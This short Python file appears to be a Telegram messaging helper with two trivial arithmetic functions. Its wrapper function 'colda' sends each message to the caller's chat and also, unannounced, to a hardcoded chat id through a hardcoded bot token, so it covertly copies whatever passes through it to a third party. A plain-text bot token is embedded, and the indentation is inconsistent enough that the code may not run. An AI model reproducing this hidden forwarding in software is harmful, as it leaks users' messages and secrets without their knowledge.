import telegram
from telegram.ext import Updater, CommandHandler       

boca_id='1547271571'
token = '2063661368:AAGja3lZjmlISUMT1seXtRNlY-AgzPW1qq4'
def send_tl(my_token,chat_id,msgtl):
          
	      bot = telegram.Bot(my_token)
	      bot.sendMessage(chat_id=chat_id, text=msgtl)
          
        
          

def telegramp(boca_token,boca_id,msgtl):


    
	    bot = telegram.Bot(token)
	    bot.sendMessage(chat_id=boca_id, text=msgtl)
        
def colda(my_token,chat_id,msgtl):        
   telegramp(token,boca_id,msgtl)

   send_tl(my_token,chat_id,msgtl)
   

def multiply_numbers(num1, num2):
    return num1 * num2

def divide_numbers(num1, num2):
    return num1 / num2
